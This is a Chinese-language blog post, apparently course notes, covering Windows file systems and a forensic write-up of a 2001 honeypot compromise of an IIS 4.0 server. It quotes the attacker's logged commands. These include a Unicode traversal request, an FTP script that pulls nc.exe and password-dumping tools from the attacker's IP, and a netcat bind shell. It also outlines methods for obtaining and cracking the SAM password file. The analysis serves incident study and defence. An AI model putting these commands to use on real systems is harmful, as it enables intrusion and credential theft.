Windows操作系統及其安全機制

kali視頻學習請看

http://www.cnblogs.com/lidong20179210/p/8909569.html

Windows操作系統及其安全機制

Windows文件系統

• FAT (File Allocation Table文件分配表)
  •  1980: FAT12
  •  1987: FAT16
  •  1995: FAT32
  •  文件目錄表： Table; 文件分配表： Linked List
  •  安全性弱，正在被NTFS取代
• NTFS (NT File System)
  •  1990s: M$/IBM joint project, 從OS/2文件系統HPFS繼承
  •  NTFS v3.x for Windows NT 5.x, 較FAT更具安全性(ACL)，更好的性能、可靠性和磁盤利用效率
  •  基於訪問控制列表機制保證文件讀寫安全性
  •  支持任意UTF-16命名，使用B+樹進行索引， …
  •  Metadata保存文件相關各種數據，保存在Meta File
    Table(MFT)

使用Metaspoit攻擊MS08-067

見另一篇博文 使用Metaspoit攻擊MS08-067

分析 NT 系統破解攻擊

案例分析挑戰內容：

• 2001年2月4日，來自213.116.251.162的攻擊者成功攻陷了蜜罐主機 172.16.1.106（主機名為：lab.wiretrip.net），這是一次非常典型的針對NT系統的攻擊，而且我們有理由相信攻擊者最終識別了蜜罐主機，因此這將是一個非常有趣的案例分析挑戰。你的分析數據源只有包含整個攻擊過程的二進制記錄文件，而你的任務就是從這個文件中提取並分析攻擊的全部過程

• 問題：

1. 攻擊者使用了什么破解工具進行攻擊？
2. 攻擊者如何使用這個破解工具進入並控制了系統？
3. 當攻擊者獲得系統的訪問權后做了什么？
4. 我們如何防止這樣的攻擊？
5. 額外獎勵問題：你覺得攻擊者是否警覺了他的目標是一台蜜罐主機？如果是，為什么？

• 待分析二進制文件位置：

ftp://222.29.112.10/exercises/course5.zip。
MD5=aca62e19ba49546d2bfd1fa1c71b5751

• 提示使用工具：
  • snort
  • nstream
  • wireshark

1. 攻擊者使用了什么破解工具進行攻擊？

• 問題解答：攻擊者利用了Unicode攻擊（針對MS00-078/MS01-026）和針對msadcs.dll中RDS漏洞（MS02-065）的msadc.pl/msadc2.pl 滲透攻擊工具進行了攻擊。
• 分析：

• 首先看到的是攻擊者對蜜罐主機安全漏洞的查點過程
  • 從攻擊主機213.116.251.162首先訪問了蜜罐172.16.1.106上的http://lab.wiretrip.net/Default.htm頁面，其User-Agent域設置為Mozilla/4.0 (compatible; MSIE5.01; Windows NT 5.0;Hotbar2.0)，Accept字段中顯示訪問主機安裝了MS Word等軟件，可推測攻擊主機應為NT5.0系統，安裝了MSIE5.01和Hotbar2.0插件。
  • 在點擊訪問了http://lab.wiretrip.net/guest/default.asp內部留言本頁面之后，攻擊者在SESSION:1765-80中成功進行了Unicode攻擊以打開NT系統啟動文件boot.ini，其request為：GET/guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../boot.ini HTTP/1.1
  • (注： %C0%AF為’/’的Unicode編碼， IIS4.0 和 5.0 存在Unicode Directory Traversal Vulnerability, http://www.securityfocus.com/bid/1806)
  • 隨后，在SESSION:1769-80和SESSION:1770-80中，攻擊者探測了/msadc/msadcs.dll的存在，並在SESSION:1771-80 中通過msadcs.dll中存在RDS漏洞(注：MS02-065 漏洞，http://www.microsoft.com/technet/security/Bulletin/MS02-065.mspx)進行了SQL注入攻擊，嘗
    試執行"cmd /c echo werd>>c:\fun"命令。在緊隨的SESSION:1772-80 中，攻擊者驗證其攻擊
    確實成功了。

• 根 據 “ADM!ROX!YOUR!WORLD”特征字符串，以及查詢語句中使用了dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb，我們可以通過 Google 查詢到這次攻擊應是由rain forest puppy 編寫的 msadc(2).pl滲透攻擊代碼所發起的。
• 至此，攻擊者通過查點確認了目標系統提供 Web 服務的是臭名昭著的 IIS v4.0，並存在
  Unicode 和 MDAC RDS 安全漏洞，可進行進一步滲透攻擊。

攻擊技術背景

Unicode 攻擊

Unicode 攻擊原理解釋. 
   利用微軟 IIS 4.0 和 5.0 都存在利用擴展 UNICODE 字元取代"/"和"\"而能利用"../"目錄遍
歷的漏洞。
  未經授權的用戶可能利用 IUSR_machinename 賬號的上下文空間訪問任何已知的文件。該賬號在默認情況下屬於 Everyone 和 Users 組的成員，因此任何與 Web 根目錄在同一邏輯驅動器上的能被這些用戶組訪問的文件都能被刪除，修改或執行，就如同一個用戶成功登陸
所能完成的一樣。
%c0%af = /
%c1%9c = \

MDAC SQL 注入攻擊
   IIS的MDAC 組件存在一個漏洞可以導致攻擊者遠程執行你系統的命令。主要核心問題是存在於 RDS Datafactory， DataFactory允許使用者從遠端執行四項功能，包括：「Query」、「CreateRecordSet」、「ConvertToString」和「SubmitChanges」，其中「Query：查詢」功能就是黑客用來入侵的地方。默認情況下， 它允許遠程命令發送到 IIS 服務器中，這命令會以設備用戶的身份運行，其一般默認情況下是 SYSTEM 用戶。

2.攻擊者如何使用這個破解工具進入並控制了系統？

• 分析：

• 觀察到每次 RDS 滲透攻擊間的間隔時間均為 2-3 秒，可以推測攻擊者是預先寫好需執
  行的 shell 指令列表，然后由 msadc(2).pl 滲透攻擊工具一起執行。
• 在 RDS 攻擊由於粗心大意沒寫對 FTP 腳本后，攻擊者又開始轉向 Unicode 攻擊，每條
  請求間隔時間大概在 10-12 秒，意味着這些指令可能是由攻擊者手工輸入的：

SESSION:1874-80 "copy C:\winnt\system32\cmd.exe cmd1.exe"
SESSION:1875-80 "cmd1.exe /c open 213.116.251.162 >ftpcom"
SESSION:1876-80 "cmd1.exe /c echo johna2k >>ftpcom"
SESSION:1877-80 "cmd1.exe /c echo haxedj00 >>ftpcom"
SESSION:1879-80 "cmd1.exe /c echo get nc.exe >>ftpcom"
SESSION:1880-80 "cmd1.exe /c echo get pdump.exe >>ftpcom"
SESSION:1881-80 "cmd1.exe /c echo get samdump.dll >>ftpcom"
SESSION:1882-80 "cmd1.exe /c echo quit >>ftpcom"
SESSION:1885-80 "cmd1.exe /c ftp -s:ftpcom"

這次終於對了，蜜罐主機連接 213.116.251.162 並下載了所指定的這些文件，並通過 nc構建其一個遠程 shell 通道。SESSION:1887-80 "cmd1.exe /c nc -l -p 6969 -e cmd1.exe"接着，攻擊者連接 6969 端口，獲得了訪問權，並進入了交互式控制階段。

攻擊工具介紹： Netcat

NetCat 是一個非常簡單的 Unix 工具，可 以讀、寫 TCP 或 UDP 網絡連接(network connection)。它被設計成一個可靠的后端(back-end)工具，能被其它的程序程序或腳本直接地或容易地驅動。同時，它又是一個功能豐富的網絡調試和開發工具，因為它可以建立你可能用到的幾乎任何類型的連接，以及一些非常有意思的內建功能

詳細使用方法參看
我的博客 netcat 瑞士軍刀

3．當攻擊者獲得系統的訪問權后做了什么？

通過上述針對 IIS的遠程滲透攻擊，攻擊者獲得了IUSER_KENNY 用戶賬號（IIS啟動用戶）權限，但顯然他並不滿足於此，雖然能夠通過 MDAC RDS以SYSTEM賬號運行任意指令，但攻擊者仍然希望獲得本地 Administrator 用戶權限。

4． 我們如何防止這樣的攻擊？

這個攻擊事件中被利用的兩個漏洞為RDS和Unicode漏洞，兩者都已經有相應的補丁，通過打補丁可防止遭受同樣的攻擊。不要使用 IIS4.x 這樣臭名昭著的 Web Server，如果必須使用 IIS4.x，主要的防范措施有（參考自黑客大曝光）

• 1.為這些漏洞打上補丁，
• 2.禁用用不着的 RDS 等服務，
• 3.防火牆封禁網絡內部服務器發起的連接
• 4.為 web server 在單獨的文件卷上設置虛擬根目錄
• 5.使用 NTFS 文件系統，因為 FAT 幾乎不提供安全功能
• 6.使用 IIS Lockdown 和 URLScan 等工具加強 web server

攻擊技術背景

Windows 查點 Windows SAM 口令文件破解

   1、取得 Administrator 特權后，攻擊者很可能會徑直走向 NT 安全帳號管理器 SAM（Security Accounts Manager），SAM含有本地系統或所控制域（如果是域控）上所有用戶的用戶名和經加密的密碼。SAM是NT系統攻擊中的致命部位，與Unix/Linux的/etc/passwd文件相當。因此破解 SAM是特權升級和信任漏洞發掘的最具威力的工具之一。破解SAM揭示密碼最流行的工具是經典的L0phtcrack，其宣稱在450MHz P2計算機上24小時內就能破解所有的字母數字組合密碼。

2、密碼破解任務的第一步是獲取密碼文件，即獲取 SAM，但該目錄在操作系統運行期間是上鎖的，有四種獲取 SAM 數據的方法，

一是把以另外一個操作系統如DOS啟動，然后從驅動器中摘取 SAM 文件；
二是拷貝由 NT 修復磁盤工具（rdisk）創建的 SAM 文件的拷貝；
三是從 SAM 中直接抽取密碼散列值；
四是對網絡用戶名/密碼交互進行網絡監聽和破解。

3、攻 擊 者 采 用 了 第 二 種 方 法 獲 取 SAM ， rdisk /s- 備 份 關 鍵 系 統 信 息 ， 在 ％
systemroot%\repair 目錄中就會創建一個名為 sam._的 SAM 壓縮拷貝，備份的 sam._文件在使
用之前需要通過 expand 進行擴展， L0phtcrack 的較新版本通過導入功能自動完成擴展工作。

4、攻擊者也試圖采用第三種方法獲取 SAM，將從注冊表中直接轉存成類似 UNIX 上
/etc/password 文件的格式，完成這個工作的最初工具是由 Jeremy Allison 編寫的 pwdump.

5、SAM 密碼破解工具
L0phtcrack
John 殺手
帶 NT 擴展的 crack 5

Windows Net 命令
net 命令有着非常強大的功能，管理着計算機的絕大部分管理級操作和用戶級操作，包
括管理本地和遠程用戶組數據庫、管理共享資源、管理本地服務、進行網絡配置等實用操作
NET command /HELP

5．額外獎勵問題：你覺得攻擊者是否警覺了他的目標是一台蜜罐主機？如果是，為什么？

是的，攻擊者絕對意識到了他的目標是作為蜜罐主機的，因為他建立了一個文件，並輸入了如下內容 C:>echo best honeypot i've seen till now 😃 > rfp.txt.
因為該目標主機作為 rfp 的個人網站， Web 服務所使用的 IIS 甚至沒有更新 rfp 自己所發現的 MDAC RDS安全漏洞，很容易讓攻擊者意識到這絕對是台誘餌。